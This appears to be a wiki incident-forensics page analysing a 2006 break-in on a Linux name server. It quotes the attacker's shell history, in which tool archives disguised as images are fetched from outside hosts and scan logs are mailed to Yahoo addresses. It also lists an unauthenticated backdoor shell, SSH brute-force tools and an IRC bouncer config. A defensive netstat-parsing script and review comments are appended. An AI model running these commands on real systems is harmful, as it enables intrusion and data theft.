Forensics on Incident 1

From YobiWiki
Revision as of 21:36, 24 November 2010 by PhilippeTeuwen (Reverted edits by Etegohy to last revision by PhilippeTeuwen)

Breach in ns0 @ e..oss

Analysis

ps auwx: 2006/03/17 +-20:20
========
test     30731  0.0  0.0   676  284 ?        S    00:21   0:00 ./ntpd
test     31116  0.0  0.2  2944 1360 ?        Ss   00:28   0:00 SCREEN
test     31117  0.0  0.2  3000 1228 pts/5    Ss   00:28   0:00 /bin/bash
test     31134  0.0  0.2  3164 1368 pts/5    S+   00:29   0:00 /bin/bash
test     32352  0.0  0.0  1444  280 ?        Ss   00:43   0:00 ./go
test     25680  0.0  0.2  2944 1412 ?        Ss   09:03   0:00 SCREEN
test     25681  0.0  0.3  3000 1656 pts/6    Ss   09:03   0:00 /bin/bash
test     25717  0.0  0.3  3160 1748 pts/6    S+   09:03   0:00 /bin/bash
test      4132  0.0  0.0  1344  204 pts/5    T+   10:40   0:00 ./go
test      4135  0.0  0.0     0    0 pts/5    Z+   10:40   0:00 [go] <defunct>
test      3211  0.0  0.0  1344  240 pts/5    T+   20:05   0:00 ./go
test      3224  0.0  0.0     0    0 pts/5    Z+   20:05   0:00 [go] <defunct>
test      4088  0.0  0.2  2704 1260 pts/6    S+   20:35   0:00 /bin/bash ./assh 24.35
test      4089 49.4  0.0  1492  456 pts/6    R+   20:35   4:43 ./pscan2 24.35 22
test      4090  0.0  0.0     0    0 pts/6    Z+   20:35   0:00 [pscan2] <defunct>
test      4097  0.0  0.2  2704 1260 pts/5    S+   20:35   0:00 /bin/bash ./assh 200.56
test      4098 49.4  0.0  1492  456 pts/5    R+   20:35   4:43 ./pscan2 200.56 22
test      4099  0.0  0.0     0    0 pts/5    Z+   20:35   0:00 [pscan2] <defunct>


Screens:
========
test@ns0:/root$ screen -ls
screen -r test/
There are screens on:
        31116.pts-4.ns0 (Detached)
        25680.pts-4.ns0 (Detached)
2 Sockets in /var/run/screen/S-test.

test@ns0:/root$ screen -r 31116

First screen:
=============
Copy of the current page:

bind: Address already in use
Norok in continuare
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.58.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P
Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.59.112.* (total: 0) (43.9% done)

Second screen:
==============
Copy of the full screen buffer:

test@ns0:/var/tmp/..  /dan$
test@ns0:/var/tmp/..  /dan$ ls
200               assh    gen-pass.sh  pass_file  sshf
200.221.pscan.22  auto    go           pscan2     ssh-scan
200.59.pscan.22   common  go.sh        ss         vuln.txt



bind: Address already in use
Norok in continuare
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.37.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P
Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.38.136.* (total: 0) (53.3% done)


test@ns0:/var/tmp/..  /2$ ./auto

Enter A class range
24
Enter output file
24
test@ns0:/var/tmp/..  /2$ chmod +x 24
test@ns0:/var/tmp/..  /2$ ./24
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
...


Bash history:
=============
Ran history in screen 25680.pts-4.ns0:
test@ns0:/var/tmp/..  /2$ history
The first 48 lines are identical to .bash_history, then:
   49  ./auto
   50  chmod +x 24
   51  ./24

Content of .bash_history:
ls
cd
ls
wget
wget rzv69.marte.ro/rzv69.tgz
tar zxvf rzv69.tgz
ls
del 404
wget fire.prohosting.com/claubuc/scaner.jpg
tar xzvf scaner.jpg
cd scaner
./assh 207.44
ls
./auto 207.44
./assh 213.186
cd /var/tmp
cd .."  "
screen
w
passwd
w
cd /var/tmp
ls -a
cd /home/test/
ls -a
cd scaner
ls -a
cat vuln.txt
cd /var/tmp
cat /etc/hosts
su vinoj
su vinoj
su trollingsecours
su trollingsecours
su trollingsecours
cd /var/tmp
ls -a
mkdir .."  "
cd .."  "
wget fire.prohosting.com/scarlatu/dan.jpg
wget fire.prohosting.com/scarlatu/psy.jpg
tar xzvf psy.jpg
cd .bash
./ntpd
cd ..
tar xzvf dan.jpg
cd dan
screen
ls -a
./go.sh 200.41
./assh 200.41
exit
w
screen -r
screen -r 30860.pts-2.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .."  "
cd dan
pico vuln.txt
rm -rf vuln.txt
touch vuln.txt
cd ..
tar xzvf dan.jpg
ls -a
cd dan
ls -a
cd ..
mv dan 1
tar xzvf dan.jpg
mv dan 2
mv 1 dan
ls -a
cd 2
screen
screen -r
screen -r 30860.pts-2.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r  25680.pts-4.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
cd /var/tmp
cd .."  "
cd 2
pico vuln.txt
cd ..
cd dan
pico vuln.txt
cat vuln.txt
clear
w
screen -r
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
ls -a
cd /var/tmp
cd .."  "
cd dan
vi vuln.txt
cd /var/tmp
cd .."  "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .." "
cd .."  "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
crontab -e

Tools:
======
* Attempt to download rzv69.marte.ro/rzv69.tgz, err 404
* Download tools from fire.prohosting.com/claubuc/scaner.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/dan.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/psy.jpg (tgz)
* Romanian scripts
* Compiled By D-a-N
* cat log|mail -s 'linux-printer' usdpower@yahoo.com (dan tools)
* cat log|mail -s 'linux-printer' scaneru_meu@yahoo.com (scaner tools)

Scans:
======
* scan ssh on ranges 200.55 200.58 200.59 24.34 24.37 24.38 207.44 213.186
Netstat extract (a few of the 800 simultaneous scans):
tcp        0      1 213.186.53.59:59930     24.35.236.71:22         SYN_SENT   4089/pscan2
tcp        0      1 213.186.53.59:60352     200.56.236.93:22        SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60288     200.56.236.29:22        SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60424     200.56.236.165:22       SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60233     200.56.235.229:22       SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60169     200.56.235.165:22       SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60095     200.56.235.91:22        SYN_SENT   4098/pscan2


IRC:
====
* Connection to IRC(6667) with psyBNC(ntpd) to 195.204.1.130
** = oslo1.no.eu.undernet.org
Netstat:
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN     30731/ntpd
tcp        0      0 213.186.53.59:34227     195.204.1.130:6667      ESTABLISHED30731/ntpd
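
An added example (not part of the original notes): a small parser for `netstat -tnp` rows like the Scans and IRC excerpts above. It groups SYN_SENT rows by program and destination port to surface a scanner, and lists wildcard listeners and the processes relaying through them. The function names, the `min_targets` threshold and the three rows on 192.0.2.x / 127.0.0.1 are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# Rows copied from the Scans and IRC netstat excerpts on this page.
PAGE_LINES = [
    "tcp        0      1 213.186.53.59:59930     24.35.236.71:22         SYN_SENT   4089/pscan2",
    "tcp        0      1 213.186.53.59:60352     200.56.236.93:22        SYN_SENT   4098/pscan2",
    "tcp        0      1 213.186.53.59:60288     200.56.236.29:22        SYN_SENT   4098/pscan2",
    "tcp        0      1 213.186.53.59:60424     200.56.236.165:22       SYN_SENT   4098/pscan2",
    "tcp        0      1 213.186.53.59:60233     200.56.235.229:22       SYN_SENT   4098/pscan2",
    "tcp        0      1 213.186.53.59:60169     200.56.235.165:22       SYN_SENT   4098/pscan2",
    "tcp        0      1 213.186.53.59:60095     200.56.235.91:22        SYN_SENT   4098/pscan2",
    "tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN     30731/ntpd",
    "tcp        0      0 213.186.53.59:34227     195.204.1.130:6667      ESTABLISHED30731/ntpd",
]
# Constructed rows (documentation/loopback addresses) that must not be flagged.
CONSTRUCTED_LINES = [
    "tcp        0      1 192.0.2.10:40000        192.0.2.25:25           SYN_SENT   900/exim4",
    "tcp        0      0 192.0.2.10:22           192.0.2.77:51515        ESTABLISHED1200/sshd",
    "tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN     700/mysqld",
]

STATES = ("ESTABLISHED|SYN_SENT|SYN_RECV|FIN_WAIT1|FIN_WAIT2|TIME_WAIT|"
          "CLOSE_WAIT|LAST_ACK|LISTEN|CLOSING|CLOSE")
# \s* (not \s+) before the PID: an 11-character state such as ESTABLISHED
# fills its column, so netstat prints "ESTABLISHED30731/ntpd" with no gap.
ROW = re.compile(
    r"^tcp6?\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?P<state>" + STATES + r")\s*(?:(?P<pid>\d+)/(?P<prog>\S+)|-)\s*$"
)


def parse(lines):
    """Return one dict per TCP row; rows that do not parse are skipped."""
    conns = []
    for line in lines:
        m = ROW.match(line.strip())
        if not m:
            continue
        lhost, lport = m["local"].rsplit(":", 1)
        rhost, rport = m["remote"].rsplit(":", 1)
        conns.append({
            "lhost": lhost, "lport": lport, "rhost": rhost, "rport": rport,
            "state": m["state"],
            "pid": int(m["pid"]) if m["pid"] else None,  # "-" when not root
            "prog": m["prog"] or "?",
        })
    return conns


def scan_suspects(conns, min_targets=5):
    """Programs with half-open (SYN_SENT) connections to many hosts on one port.
    min_targets is an assumed threshold; tune it to the host's normal traffic."""
    targets, pids = defaultdict(set), defaultdict(set)
    for c in conns:
        if c["state"] == "SYN_SENT":
            key = (c["prog"], c["rport"])
            targets[key].add(c["rhost"])
            if c["pid"] is not None:
                pids[key].add(c["pid"])
    return {k: {"pids": sorted(pids[k]), "targets": len(t)}
            for k, t in targets.items() if len(t) >= min_targets}


def wildcard_listeners(conns):
    """LISTEN sockets bound to every interface, as (port, pid, prog)."""
    rows = [(int(c["lport"]), c["pid"], c["prog"]) for c in conns
            if c["state"] == "LISTEN" and c["lhost"] in ("0.0.0.0", "::")]
    return sorted(rows, key=lambda r: r[0])


def relays(conns):
    """PIDs that own a wildcard listener and also hold an outbound ESTABLISHED
    connection (its local port is not one of the PID's listening ports)."""
    listening = defaultdict(set)
    for port, pid, _ in wildcard_listeners(conns):
        listening[pid].add(port)
    out = defaultdict(list)
    for c in conns:
        if (c["state"] == "ESTABLISHED" and c["pid"] in listening
                and int(c["lport"]) not in listening[c["pid"]]):
            out[c["pid"]].append((c["rhost"], c["rport"]))
    return dict(out)


if __name__ == "__main__":
    conns = parse(PAGE_LINES + CONSTRUCTED_LINES)
    for (prog, port), hit in scan_suspects(conns).items():
        print(f"scan:     {prog} -> port {port}: "
              f"{hit['targets']} targets, pids {hit['pids']}")
    for port, pid, prog in wildcard_listeners(conns):
        print(f"listener: {prog} (pid {pid}) on *:{port}")
    for pid, peers in relays(conns).items():
        print(f"relay:    pid {pid} listens and connects out to {peers}")
```

On a live host the input would be the output of `netstat -tnp` run as root; a row whose last column is `-` parses with pid `None`.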

Diffs between the downloaded tool and the hacker's version:

--- log/psybnc.log	1970-01-01 01:00:00.000000000 +0100
+++ log/psybnc.log	2006-03-19 23:32:53.000000000 +0100
@@ -0,0 +1,15 @@
+Fri Mar 17 00:21:14 :Listener created :0.0.0.0 port 6667
+Fri Mar 17 00:21:14 :psyBNC2.3BETA-cBtITLdDMSNp started (PID :30731)
+Fri Mar 17 00:21:14 :Loading all Users..
+Fri Mar 17 00:21:14 :No Users found.
+Fri Mar 17 00:21:29 :connect from 209-NAT.s-man.net
+Fri Mar 17 00:21:31 :Lost Connection from 209-NAT.s-man.net (dan)
+Fri Mar 17 00:22:31 :connect from 209-NAT.s-man.net
+Fri Mar 17 00:22:39 :Noul User:dan (x) a fsot adaugat de  dan
+Fri Mar 17 00:22:48 :User dan () nu are nici un server adaugat
+Fri Mar 17 00:23:05 :User dan () trying lelystad.nl.eu.undernet.org port 6667 ().
+Fri Mar 17 00:23:05 :User dan () connected to lelystad.nl.eu.undernet.org:6667 ()
+Fri Mar 17 00:23:27 :Userul dan () A fost deconectat(de la lelystad.nl.eu.undernet.org) motivul: Closing Link: D4aNieL by Lelystad.NL.EU.UnderNet.Org (K-lined)
+Fri Mar 17 00:23:42 :User dan () trying 195.204.1.130 port 6667 ().
+Fri Mar 17 00:23:43 :User dan () connected to 195.204.1.130:6667 ()
+Fri Mar 17 00:30:35 :User dan quitted (from 209-NAT.s-man.net)
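
Review bot: the +++ timestamp on this hunk (2006-03-19 23:32:53) is the same on all three files in this diff, so it looks like the time the evidence was copied rather than the time the log was written; the write-up should say so and take event times from the entries themselves, which run from Fri Mar 17 00:21:14 to 00:30:35 and carry no year or time zone. It is also worth stating next to this hunk that "PID :30731" is the ./ntpd process from the ps listing, since this log is what ties that binary name to psyBNC.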

--- motd/USER1.MOTD	1970-01-01 01:00:00.000000000 +0100
+++ motd/USER1.MOTD	2006-03-19 23:32:53.000000000 +0100
@@ -0,0 +1,71 @@
+:Oslo1.NO.EU.undernet.org 001 D4aNieL :Welcome to the UnderNet IRC Network, D4aNieL

+:Oslo1.NO.EU.undernet.org 002 D4aNieL :Your host is Oslo1.NO.EU.undernet.org, running version u2.10.11.07

+:Oslo1.NO.EU.undernet.org 003 D4aNieL :This server was created Mon Sep 5 2005 at 01:40:32 CEST

+:Oslo1.NO.EU.undernet.org 004 D4aNieL Oslo1.NO.EU.undernet.org u2.10.11.07 dioswkgx biklmnopstvr bklov

+:Oslo1.NO.EU.undernet.org 005 D4aNieL WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE SILENCE=15 MODES=6 MAXCHANNELS=30 MAXBANS=45 NICKLEN=12 MAXNICKLEN=15 :are supported by this server

+:Oslo1.NO.EU.undernet.org 005 D4aNieL TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,imnpstr CASEMAPPING=rfc1459 NETWORK=UnderNet :are supported by this server

+:Oslo1.NO.EU.undernet.org 251 D4aNieL :There are 31261 users and 80486 invisible on 28 servers

+:Oslo1.NO.EU.undernet.org 252 D4aNieL 82 :operator(s) online

+:Oslo1.NO.EU.undernet.org 253 D4aNieL 237 :unknown connection(s)

+:Oslo1.NO.EU.undernet.org 254 D4aNieL 42167 :channels formed

+:Oslo1.NO.EU.undernet.org 255 D4aNieL :I have 7253 clients and 1 servers

+:Oslo1.NO.EU.undernet.org 375 D4aNieL :- Oslo1.NO.EU.undernet.org Message of the Day -

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 2005-12-16 5:48

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Welome to Oslo*.NO.EU.undernet.org

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Disclaimer / Rules

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Irc is an umoderated international medium. Cloning is

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         strictly forbidden on this server, any clones will

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         not be tolerated. Mass Messaging / Mass Invites are not

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         allowed on any Undernet server, any offenders will be killed.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Using this server means you agree to all of its rules and the

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         rules of Undernet. If you cannot agree to this then /quit now.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Server contact info:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         E-mail     : oslo@undernet.org

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     News:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         [12.05.2005]

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         We are out of news.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         [12.12.2004]

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         We shut down the channel #banetele. Most of the users in there needed

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         reop/channel related helping and we have #nastrand for that. For info

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         not related to channel/user problems, email oslo@undernet.org.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         [26.08.2003]

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         We are back online :)

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Thank you to our provider www.banetele.com for all help!

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Ports:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-                 6666, 6667, 6668, 7000

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Bot Policies:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         It is allowed to run NON abusive bots on this server, all abusive

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         bots will be killed on sight.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Undernet has Cservice. Go to http://cservice.undernet.org

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         or #Cservice if you have any questions.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Help Channels:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #nastrand       ->      Oper/IRC Help

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #cservice       ->      Cservice questions

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #mIRC           ->      For mIRC questions

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #vh             ->      For help with viruses

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #helpchan       ->      IRC Help

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Please notice that these channels are not administrated by the

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         oslo.* crew and we and/or the server sponsors can not be held

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         responsible for actions taken or info given in the channels.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     AGAIN .. READ THIS !!

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         NO CLONES, NO FLOODING, NO HARASSING, NO SPAMMING!

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         The use of this server is no right, but a privilege. The admin(s)

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         and opers can revoke this priviledge without further notice and

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         without a reason.

+:Oslo1.NO.EU.undernet.org 376 D4aNieL :End of /MOTD command.
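
Review bot: the nick recorded throughout this cached MOTD is D4aNieL, which differs from USER1.USER.NICK=D-a-N in psybnc.conf and matches the K-lined nick in psybnc.log; the Tools list mentions only "Compiled By D-a-N", so D4aNieL should be recorded there as a second handle. The 372 lines are the server's MOTD banner and add nothing beyond the server name Oslo1.NO.EU.undernet.org.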


--- psybnc.conf	2003-04-07 14:47:00.000000000 +0200
+++ psybnc.conf	2006-03-19 23:32:53.000000000 +0100
@@ -1,3 +1,25 @@
 PSYBNC.SYSTEM.PORT1=6667
 PSYBNC.SYSTEM.HOST1=*

 PSYBNC.HOSTALLOWS.ENTRY0=*;*

+USER1.USER.LOGIN=dan
+USER1.USER.USER=x
+USER1.USER.PASS==0x'q'0'W`2'S0I'F`x
+USER1.USER.RIGHTS=1
+USER1.USER.VLINK=0
+USER1.USER.PPORT=0
+USER1.USER.PARENT=0
+USER1.USER.QUITTED=0
+USER1.USER.DCCENABLED=1
+USER1.USER.AUTOGETDCC=0
+USER1.USER.AIDLE=0
+USER1.USER.LEAVEQUIT=0
+USER1.USER.AUTOREJOIN=1
+USER1.USER.SYSMSG=1
+USER1.USER.LASTLOG=0
+USER1.USER.NICK=D-a-N
+USER1.SERVERS.SERVER1=lelystad.nl.eu.undernet.org
+USER1.SERVERS.PORT2=6667
+USER1.SERVERS.SERVER2=195.204.1.130
+USER1.SERVERS.PORT1=6667
+USER1.CHANNELS.ENTRY1=#porumbei
+USER1.CHANNELS.ENTRY0=#xibit
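
Review bot: the added SERVERS keys are not in index order (SERVER1, PORT2, SERVER2, PORT1), so they have to be paired by number, not by position: SERVER1/PORT1 is lelystad.nl.eu.undernet.org:6667 and SERVER2/PORT2 is 195.204.1.130:6667, the same order psybnc.log shows being tried. The unchanged context lines PSYBNC.SYSTEM.HOST1=* and PSYBNC.HOSTALLOWS.ENTRY0=*;* deserve a sentence in the IRC section as well, because together with the 0.0.0.0:6667 LISTEN row they show the bouncer was an inbound service on this host, not only an outbound IRC client.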


Backdoor:
=========
* ./go opens port 19876 with a shell without auth
cf http://www.2701.org/archive/200311240000.html
Netstat:
tcp        0      0 0.0.0.0:19876           0.0.0.0:*               LISTEN     32352/go

* ./ss
cf http://www.securiteam.com/tools/5EP0B0ADFO.html
Fast SYN Scanner (libnet, libpcap)  11 Jul. 2004
Credit:
The information has been provided by Doctor BIOS.
The following tool is a fast SYN scanner written in C.

vuln.txt:
=========
cf http://www.lockeddown.net/rst-expl.txt

ssh brute-force:
================
ssh-scan and sshf

./sshf <procese adika cate de alea deodata incerc>
~= how many processes to run together

/etc/passwd:
============
test:x:1024:1024:,,,:/home/test:/bin/false

mails:
======
cat /etc/passwd
/sbin/ifconfig |grep inet
cat /etc/hosts
uname -a
w
ping -c 3 www.yahoo.com
cat vuln.txt
chmod +x go
./go

139P Received: from test by ns0.exxoss.com with local (Exim 4.50)
	for usdpower@yahoo.com; Fri, 17 Mar 2006 17:35:14 +0100
023T To: usdpower@yahoo.com
023  Subject: linux-printer
047I Message-Id: <E1FKHv0-0008GG-4C@ns0.exxoss.com>
034F From: ",,," <test@ns0.exxoss.com>
038  Date: Fri, 17 Mar 2006 17:35:14 +0100

To-be-Mailed data:
(one of the hosts accepted sixteen different root passwords: probably a honeypot)

RST virus:
==========
Quick and dirty way to find infected files (-f makes strings print the file name in front of each match):
find . -type f -exec strings --all -f {} \; | grep snortdos

Files: "Dumb" scan of all files
Switches: -ARCHIVE -PACKED -SERVER
/tmp/scaner/go  Infection: Unix/RST.B
/tmp/scaner/pscan2  Infection: Unix/RST.B
/tmp/scaner/ss  Infection: Unix/RST.B
/tmp/scaner/ssh-scan  Infection: Unix/RST.B
/tmp/scaner/sshf  Infection: Unix/RST.B
Results of virus scanning:
Infected: 5

It seems that the infected files update themselves at each run and modify their timestamps:
/home/test/scaner:
  23714 2006-03-06 23:23 go
  25503 2005-05-06 19:00 pscan2
 458068 2006-03-07 00:03 ss
 846520 2006-03-07 00:03 sshf
 846832 2006-03-06 23:12 ssh-scan
/var/tmp/..  /2:
  23714 2006-03-17 21:17 go
  25503 2006-03-17 21:17 pscan2
 458068 2006-03-17 21:17 ss
 846520 2006-03-17 21:17 sshf
 846832 2006-03-17 21:17 ssh-scan
/var/tmp/..  /dan:
  23714 2006-03-17 10:35 go
  25503 2006-03-17 21:17 pscan2
 458068 2006-03-17 21:17 ss
 846520 2006-03-17 21:17 sshf
 846832 2006-03-17 21:17 ssh-scan

21:17 corresponds to the crash of the server, so the infected executables were probably left open even after being killed.

Note: same virus present also in:
/ns0/var/www/www.fmjbf.org/phpSecurePages/bindtty2: Linux.RST.B FOUND
/ns0/var/www/www.fmjbf.org/phpSecurePages/btty: Linux.RST.B FOUND



TIMELINE:
=========

2006/02/16 08:58:08	82.79.137.30		vsftpd: Thu Feb 16 08:58:08 2006 [pid 23877] [demo] FAIL LOGIN: Client 		"82.79.137.30"
						Mar  6 12:28:21 localhost sshd[31087]: error: PAM: Authentication failure for skycode from 193.190-200-80.adsl.skynet.be
						Mar  6 12:28:24 localhost sshd[31087]: Accepted keyboard-interactive/pam for skycode from 80.200.190.193 port 13329 ssh2
						Mar  6 12:29:31 localhost sudo:  skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash
						Mar 06 06 12:30:50     4096 m.c drwxr-xr-x root     root     /etc/webmin
			            				        639 m.c -rw------- root     root     /etc/webmin/miniserv.conf
						Mar  6 12:31:05 localhost webmin[31297]: Webmin starting
						Mar  6 12:31:13 localhost webmin[31307]: Successful login as root from 193.190-200-80.adsl.skynet.be
2006/03/06 13:48:47	82.79.137.24	*	vsftpd: Mon Mar  6 13:48:47 2006 [pid 4586] [test] OK LOGIN: Client 		"82.79.137.24"
						Mar 03 06 15:53:30       21 m.c -rw-r----- root     shadow   /etc/webmin/miniserv.users
						Mar 03 06 16:11:31     4096 m.c drwxr-xr-x root     root     /etc/exim4
		    			    	                   7838 m.c -rw-r--r-- root     root     /etc/exim4/exim4.conf
						Mar  6 17:59:47 localhost sshd[22697]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 11272 ssh2
						Mar  6 19:43:12 localhost sshd[32573]: Accepted publickey for dorian1200 from 217.117.45.148 port 49764 ssh2
						Mar  6 19:43:17 localhost sudo: dorian1200 : TTY=pts/4 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
						Mar  6 20:22:42 localhost sshd[3285]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 12754 ssh2
						dorian12 pts/2        217.117.45.148   Mon Mar  6 21:38 - 21:40  (00:01)
						Mar  6 21:38:37 localhost sshd[10242]: Accepted publickey for dorian1200 from 217.117.45.148 port 44246 ssh2
						Mar  6 21:38:44 localhost sudo: dorian1200 : TTY=pts/2 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
2006/03/06 22:27:30	82.79.137.26		26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:30 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:27:31	82.79.137.26		26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:31 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.56/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:28:16	82.79.137.27		Mar  6 22:28:16 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27
2006/03/06 22:28:18	82.79.137.27		vsftpd: Mon Mar  6 22:28:18 2006 [pid 14875] [anonymous] FAIL LOGIN: Client 	"82.79.137.27"
2006/03/06 22:28:18	82.79.137.18		Mar  6 22:28:18 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.18
2006/03/06 22:28:20	82.79.137.18		vsftpd: Mon Mar  6 22:28:20 2006 [pid 14881] [anonymous] FAIL LOGIN: Client 	"82.79.137.18"
2006/03/06 22:28:29	82.79.137.25	*	vsftpd: Mon Mar  6 22:28:29 2006 [pid 14911] [test] OK LOGIN: Client 		"82.79.137.25"
2006/03/06 22:28:30	82.79.137.14	*	vsftpd: Mon Mar  6 22:28:30 2006 [pid 14914] [test] OK LOGIN: Client 		"82.79.137.14"
